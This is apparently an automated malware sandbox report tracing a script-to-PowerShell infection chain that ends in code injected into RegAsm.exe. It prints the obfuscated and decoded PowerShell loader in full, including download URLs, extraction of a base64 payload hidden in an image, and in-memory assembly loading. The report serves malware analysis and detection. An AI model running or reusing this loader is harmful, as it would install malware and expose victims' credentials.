                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: scorlib.pdb.0 source: powershell.exe, 00000004.00000002.1594380828.000001BE2001B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: re.pdbc| source: powershell.exe, 00000004.00000002.1594380828.000001BE2001B000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@", "0")
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs.Net Code: Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777297)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777248)),Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777365))})
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, w0gUvjn1pmlF6l1K21B.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: 6.2.RegAsm.exe.5a20000.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 6.2.RegAsm.exe.5a20000.4.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 6.2.RegAsm.exe.5a20000.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 6.2.RegAsm.exe.5a20000.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 6.2.RegAsm.exe.5a20000.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, LgU3ZivqUV3r7RL9fo.cs.Net Code: ly0p2K4b2 System.AppDomain.Load(byte[])
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, GaIFs45gtG5cwTqScn0.cs.Net Code: C6pSB6ksgY
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, GaIFs45gtG5cwTqScn0.cs.Net Code: M0WjjfBaxD
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
